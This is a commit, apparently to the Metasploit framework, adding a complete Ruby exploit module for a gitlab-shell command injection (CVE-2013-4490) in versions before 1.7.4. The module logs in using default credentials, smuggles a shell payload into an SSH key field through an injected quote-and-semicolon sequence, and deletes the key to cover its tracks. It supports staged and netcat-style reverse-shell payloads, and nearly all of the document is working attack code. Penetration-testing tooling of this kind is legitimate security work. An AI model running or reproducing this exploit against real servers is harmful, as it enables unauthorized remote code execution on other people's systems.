Add gitlab-shell command injection module

kaospunk · kaospunk · commit 48359faaaf5b · 2014-08-05T23:21:57.000-04:00
This request adds a module for gitlab-shell command injection for versions prior to 1.7.4. This has been tested by installing version 7.1.1 on Ubuntu and then using information at http://intelligentexploit.com/view-details.html?id=17746 to modify the version of gitlab-shell to a vulnerable one. This was done as I could not find a better method for downloading and deploying an older, vulnerable version of Gitlab.
diff --git a/modules/exploits/multi/http/gitlab_shell_exec.rb b/modules/exploits/multi/http/gitlab_shell_exec.rb
@@ -0,0 +1,199 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'net/ssh'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Gitlab-shell Code Execution',
+      'Description'    => %q(
+          This module takes advantage of the addition of authorized
+          ssh keys in the gitlab-shell functionality of Gitlab. Versions
+          of gitlab-shell prior to 1.7.4 used the ssh key provided directly
+          in a system call resulting in a command injection vulnerability. As
+          this relies on adding an ssh key to an account valid credentials
+          are required to exploit this vulnerability.
+      ),
+      'Author'  =>
+        [
+          'Brandon Knight'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'https://about.gitlab.com/2013/11/04/gitlab-ce-6-2-and-5-4-security-release/'],
+          ['CVE', '2013-4490']
+        ],
+      'Platform'  => 'linux',
+      'Targets'        =>
+        [
+          ['Linux', {
+            'Platform' => 'linux',
+            'Arch' => ARCH_X86
+          }],
+          ['Linux (x64)', {
+            'Platform' => 'linux',
+            'Arch' => ARCH_X86_64
+          }],
+          ['Unix (CMD)', {
+            'Platform' => 'unix',
+            'Arch' => ARCH_CMD,
+            'Payload' =>
+                {
+                  'Compat'      => {
+                    'RequiredCmd' => 'perl python ruby openssl netcat'
+                  }
+                }
+
+          }]
+        ],
+      'CmdStagerFlavor' => %w( bourne printf ),
+      'DisclosureDate' => 'Nov 4 2013',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('USERNAME',  [true, 'The username to authenticate as', 'root']),
+        OptString.new('PASSWORD',  [true, 'The password for the specified username', '5iveL!fe']),
+        OptString.new('TARGETURI', [true,  'The path to Gitlab', '/'])
+      ], self.class)
+  end
+
+  def exploit
+    if target.name == 'Unix (CMD)'
+      execute_command(payload.encoded)
+    else
+      execute_cmdstager(temp: './', linemax: 2800)
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    session_cookie = login
+    key_id = add_key(session_cookie, cmd)
+    delete_key(session_cookie, key_id)
+  end
+
+  def login
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+    signin_page = datastore['TARGETURI'] + 'users/sign_in'
+
+    # Get a valid session cookie and authenticity_token for the next step
+    res = send_request_cgi(
+                            'method' => 'GET',
+                            'cookie' => 'request_method=GET',
+                            'uri'    => signin_page
+    )
+
+    fail_with(Failure::Unknown, "#{peer} - Connection timed out during login") unless res
+
+    session_cookie = res.get_cookies.scan(/(_gitlab_session=[a-z0-9]+)/).flatten[0] || ''
+    auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
+
+    # Perform the actual login and get the newly assigned session cookie
+    res = send_request_cgi(
+                            'method' => 'POST',
+                            'cookie' => session_cookie,
+                            'uri'    => signin_page,
+                            'vars_post' =>
+                              {
+                                'utf8' => "\xE2\x9C\x93",
+                                'authenticity_token' => auth_token,
+                                'user[login]' => username,
+                                'user[password]' => password,
+                                'user[remember_me]' => 0
+                              }
+                          )
+
+    fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res
+
+    session_cookie = res.get_cookies.scan(/(_gitlab_session=[a-z0-9]+)/).flatten[0]
+
+    session_cookie
+  end
+
+  def add_key(session_cookie, cmd)
+    add_key_base = datastore['TARGETURI'] + 'profile/keys'
+
+    # Perform an initial request to get an authenticity_token so the actual
+    # key addition can be done successfully.
+    res = send_request_cgi(
+                            'method' => 'GET',
+                            'cookie' => "request_method=GET; #{session_cookie}",
+                            'uri'    => add_key_base + '/new'
+    )
+
+    fail_with(Failure::Unknown, "#{peer} - Connection timed out during request") unless res
+
+    auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
+    title = rand_text_alphanumeric(16)
+    key_info = rand_text_alphanumeric(6)
+
+    # Generate a random ssh key
+    key = OpenSSL::PKey::RSA.new 2048
+    type = key.ssh_type
+    data = [key.to_blob].pack('m0')
+
+    openssh_format = "#{type} #{data}"
+
+    # Place the payload in to the key information to perform the command injection
+    key = "#{openssh_format} #{key_info}';#{cmd}; echo '"
+
+    res = send_request_cgi(
+                            'method' => 'POST',
+                            'cookie' => "request_method=GET; #{session_cookie}",
+                            'uri'    => add_key_base,
+                            'vars_post' =>
+                              {
+                                'utf8' => "\xE2\x9C\x93",
+                                'authenticity_token' => auth_token,
+                                'key[title]' => title,
+                                'key[key]' => key
+                              }
+                          )
+
+    fail_with(Failure::Unknown, "#{peer} - Request to add key failed") unless res
+
+    # Get the newly added key id so it can be used for cleanup
+    key_id = res.headers['Location'].split('/')[-1]
+
+    key_id
+  end
+
+  def delete_key(session_cookie, key_id)
+    key_base = datastore['TARGETURI'] + 'profile/keys'
+
+    res = send_request_cgi(
+                             'method' => 'GET',
+                             'cookie' => "request_method=GET; #{session_cookie}",
+                             'uri'    => key_base
+                           )
+
+    fail_with(Failure::Unknown, "#{peer} - Connection timed out during request") unless res
+
+    auth_token = res.body.scan(/<meta content="(.*?)" name="csrf-token"/).flatten[0]
+
+    # Remove the key which was added to clean up after ourselves
+    res = send_request_cgi(
+                             'method' => 'POST',
+                             'cookie' => "#{session_cookie}",
+                             'uri'    => "#{key_base}/#{key_id}",
+                             'vars_post' =>
+                             {
+                               '_method' => 'delete',
+                               'authenticity_token' => auth_token
+                             }
+                           )
+
+    fail_with(Failure::Unknown, "#{peer} - Request to delete key failed") unless res
+  end
+end
